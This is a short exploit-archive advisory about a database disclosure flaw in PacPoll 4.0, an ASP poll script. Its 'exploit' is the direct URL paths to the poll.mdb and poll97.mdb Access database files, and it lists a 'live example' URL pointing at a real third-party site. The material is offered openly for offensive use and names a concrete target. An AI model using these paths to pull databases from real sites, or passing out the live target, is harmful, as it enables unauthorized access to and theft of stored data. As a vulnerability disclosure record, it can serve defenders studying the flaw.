id: 4332
date: 12/01/2008
title: PacPoll 4.0 (poll.mdb/poll97.mdb) Database Disclosure Vulnerability
author: AlpHaNiX
cves: 

===================================================================
PacPoll 4.0 (poll.mdb/poll97.mdb) Database Disclosure Vulnerability
===================================================================


###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


----------------------------------------------------------



#found by : OffensiveTrack
#Author   : AlpHaNiX

###########################################################################



#script   : PacPoll
#version  : v4
#download : http://pacosdrivers.com/asp/poll/count.asp?u_link=dload.asp




#Exploit :
http://target.com/script/poll.mdb
http://target.com/script/poll97.mdb

#live example :
http://pacosdrivers.com/asp/poll/poll.mdb



#  0day.today [2023-03-27]  #